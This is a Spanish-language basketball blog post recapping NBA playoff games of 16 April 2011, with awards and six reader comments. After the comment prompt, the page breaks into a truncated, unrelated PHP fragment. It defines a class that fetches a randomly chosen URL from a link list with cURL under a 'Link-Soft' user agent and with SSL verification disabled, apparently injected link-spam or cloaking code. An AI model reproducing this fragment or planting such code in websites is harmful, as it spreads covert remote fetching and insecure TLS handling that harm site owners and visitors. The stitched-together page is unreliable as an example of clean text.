Playoffs (16/04/2011): Superman no es omnipotente

17 de April de 2011 por txusma

Ya lo avisamos en nuestro análisis: Los Magic dependen excesivamente de Dwight Howard. Anoche, “Superman” se marcó un partido histórico (46 puntos y 19 rebotes) a la altura de jugadores como Olajuwon, Chamberlain o Baylor pero a excepción de Jameer Nelson, ningún otro jugador de Orlando fue capaz de pasar de los 6 puntos y su equipo cayó ante los Hawks (93-103). En contraposición al partidazo de Howard, hasta 5 jugadores de Atlanta pasaron de los 10 puntos en un estilo de juego mucho  más coral, rápido y preciosista. En cambio, Turkoglu, Richardson, Bass, Arenas, Redick, y Anderson se combinaron para anotar 8 de sus 34 lanzamientos, suponiendo todo un lastre para las aspiraciones de su equipo. Más les vale estar más acertados en el siguiente partido si no quieren irse para casa mucho más rápido de lo previsto.

Donde estuvo a punto de saltar la sorpresa fue en Chicago, en un partido en el que el equipo de casa sudó para amarrar su primera victoria en los Playoffs (99-104). Indiana dominó en el marcador durante 44 minutos pero se dejó remontar en el último cuarto por unos Bulls dirigididos por el futuro MVP, HOF y todo lo que se proponga, Derrick Rose. Los Pacers le pusieron las cosas muy difíciles a Chicago, con Granger y Hansbrough haciéndoles un roto considerable. Posiblemente la baja momentánea de Hansbrough, que se tuvo que retirar unos minutos tras un codazo involutario de Kurt Thomas, fue clave en el devenir del partido. La explosión de alegría del banquillo rojo tras el pitido final sólo puede entenderse tras el sufrimiento y la tensión vividas durante todo el encuentro. Veremos como afecta esta dura derrota a los Pacers en lo que queda de eliminatoria.

Los Heat también sufrieron hasta el final. Tras dominar cómodamente desde el segundo cuarto de la mano de un Chris Bosh inspiradísimo, se dejaron remontar en el último hasta ver como los Sixers se ponían a un solo punto a escasos minutos para el final. En ese momento apareció la figura de Dwyane Wade que cerró el partido como en los tiempos en que todas las bolas calientes eran suyas y solo suyas (89-97). Philadelphia se quejó amargamente de la diferencia de criterio a la hora de pitar faltas y de la cantidad de veces que los Heat fueron a la línea en comparación con sus jugadores (39 contra 15). Bienvenidos a los Playoffs.

Y en Dallas, Nowitzki y Kidd llevaron en volandas a su equipo a la victoria en un último cuarto memorable (81-89). Las cosas se les habían puesto muy feas a los tejanos a mediados del último período después de que los Blazers remontaran una diferencia de 10 puntos y llegaran a ponerse 6 arriba. Nowitzki había estado horrible durante todo el partido pero emergió en los minutos más calientes del partido para asumir la responsabilidad y liderar a los Mavs. Contra todo pronóstico, Rudy Fernandez jugó un buen número de minutos en los que estuvo más que correcto. Eso sí, no le pidamos más.

PREMIOS

MVP: Derrick Rose no ha hecho sinó refrendar que ha sido y es el mejor jugador de la temporada. 39 puntos, 6 rebotes, 6 asistencias, 3 tapones y una actuación clave en el último cuarto. No se puede pedir más a tu jugador franquicia.

Rookie: Playoffs no es terreno para los rookies.

Sorpresa: Jason Kidd anotó 24 puntos con una gran serie de lanzamientos (9 de 16) que incluyó hasta 6 triples. Han tenido que llegar los Playoffs para que Mr. Triple Doble consiguiera su mejor marca anotadora de la temporada.

Decepción: Los compañeros de Howard no estuvieron a su altura al anotar tan solo un 23% en tiros de campo. Lo quieran o no, ellos son el termómetro de su eliminatoria.

Esfuerzo en vano: 46 puntos y 19 rebotes para Dwight Howard, demasiado solo ante el ímpetu de los Hawks.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Javijaen dice:
    #1

    Bueno, mi opinión es sólo basándome en estadísticas, ya que no pude ver ningún partido ayer. El que me hubiese gustado ver era el de los Bulls, que no era a una hora muy mala, y parece que sufrieron bastante, remontando en el último cuarto más de 8 puntos de diferencia (¿nervios PO?). También sufrieron Heat, pero Bosh hizo de LeBron y éste hizo de Wade (es lo que tiene tener a estos tres juntos). Aunque hayan empezado con dudas, sigo apostando por 4-0 y 4-1 respectivamente. Dallas con buenos números solo aguantó porque Nowiizki explotó al final, así que el pronóstico sorpresa de Portland lo reservo aún. Quien defraudó fue Magic, ya apuntábamos algunos que Hawks podían dar la sorpresa, y la dieron, y eso con Howard en plan MVP (Howard, vente a los Knicks, jejej). Esperando esta noche, a ver si Celtics tienen también estos “nervios”…

      Citar

  2. Jose Luis dice:
    #2

    Pues yo vi el Pacers@Bulls y el Hawks@Magic.

    En el primero vi a Collison como en sus mejores tiempos, Granger y Hansbrough como dos monstruos anotando, Hibbert bien en defensa, chocando mucho y muy bien con Rose en los pick & roll, y el resto a su nivel normal. Fueron liderando por su acierto en los triples y las pérdidas de los Bulls, aparte de una buena defensa. En Chicago Rose bien, pero algo precipitado (le vi tirarse un triple desde el drible quedando 20 segundos de posesión, 0-9 en el partido), Boozer mal con las faltas, Noah peor que de costumbre, Deng bien pero superado por Granger, Bogans correcto, y Korver-francotirador saliendo con puntos desde el banquillo. Kurt Thomas protestón, y a Asik apenas le vimos, una pena. Ganaron los Bulls por su mejor dominio en el último cuarto gracias a tener en sus filas a MVP Rose.

    En Orlando se vió algo que se podía esperar. Con un Howard superlativo en la primera parte, los Magic se iban abajo por 7. Atlanta iba por delante gracias a una buena defensa perimetral y a un gran acierto en tiros lejanos con suspensiones complicadas. Me imagino el discurso del entrenador de los Hawks “seguid haciéndole faltas a Howard, se descentrará, lleva 10 de 11 en tiros libres pero ya bajará el porcentaje”, y es que eso no era normal. Así, en el tercer cuarto, Howard desaparece entre faltas ofensivas, técnicas, pérdidas y tiros libres fallados (hasta 6 consecutivos si no me equivoco) y el testigo lo coge Jameer Nelson, con 20 puntos sólo en ese cuarto. Los Hawks a estas alturas ya tenían a 5 jugadores con más de 10 puntos. Muy bien Horford, con ese tirito de 4-5 metros, me gusta Smith de titular ante Turkoglu (no sé si lo mantendrán en futuras rondas).

    Y vi comenzar el último cuarto, pero cuando vi las dos tempranas faltas de Howard, me fui a la cama. No sé si estuvo a su nivel normal tanto en defensa como en ataque (anotó varios puntos), pero ante el riesgo de quedarme con un Orlando Magic sin Howard, decidí irme a la cama que hoy habia Fórmula 1.

      Citar

  3. Viva_Dirk dice:
    #3

    Antes de hacer el análisis del Orlando – Atlanta pensaba en Orlando como claro favorito, pero después analizar los enfrentamientos directos y ver estadísticas globales tenia claro que los Hawks tienen los mimbres para dominar la eliminatoria, dependen de ellos mismos.

    En los Mavs gran acierto de Kidd y tremendo final de Nowitzki, importante partido ganado casi sin Chandler ni Marion y con la (otra vez) baja de Beaubois.

      Citar

  4. Denise dice:
    #4

    No todos los dias el equipo va a estar desacertado como ayer excepto Howard y Nelson. Sigo viendo a los Magic favoritos en la eliminatoria. Lo malo, es que a Howard se le va a acabar la paciencia, y estoy seguro que en 2012 se pira.

      Citar

  5. Ru dice:
    #5

    Yo elegí un Portland – Dallas como plato único y la verdad es que el partido a pesar de un marcador bajo estuvo muy bien,gracias a los alleyhoops en los Blazers -uno de Rudy a Gerald Wallace me encanta,fue al milímetro-,el duelo LaMarcus vs Nowitzki y el bombardeo de Kidd desde los triples.Quizás esto último fue lo más determinante para que Dallas estuviera en el partido porque al inal de tercer cuarto el alemán llevaba un pobre 5 de 17.Eso sí,el último cuarto fue digno del jugador que es,para delirio de Cuban.Aún así eliminatoria larga que lo fácil es que Matthews y Roy hagan mejores partidos.Por cierto,Batum está en una forma excepcional.

    Por otro lado comentar que me alegro por Hansbrough,gran actuación frente a Noah y Boozer.Muchos dudaban de su adaptación a la NBA,típico jugador undersized que es un dios en la NCAA a base de garra,talento y cabeza -mi jugador favorito y la razón por la que soy un Tar Heel- pero que en el salto a profesionales….posiblemente haya sido el jugador más beneficiado por el cambio de entrenador en Indiana.

      Citar

  6. JHC dice:
    #6

    como ya apunte en el analisis de esta serie… se cumplio Atlanta tiene mas variedades para anotar dobles digitos (pese a la gran falta de banquillo k tiene) pero ayer Howard estuvo muy solo, solo Nelson parecia tener sangre ayer, fatal Turkoglu y Arenas no lo izo mal pero tuvo pocos minutos. Si Orlando kiere ganar la serie tendra que buscar una solución que no sea balones a Hodward

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>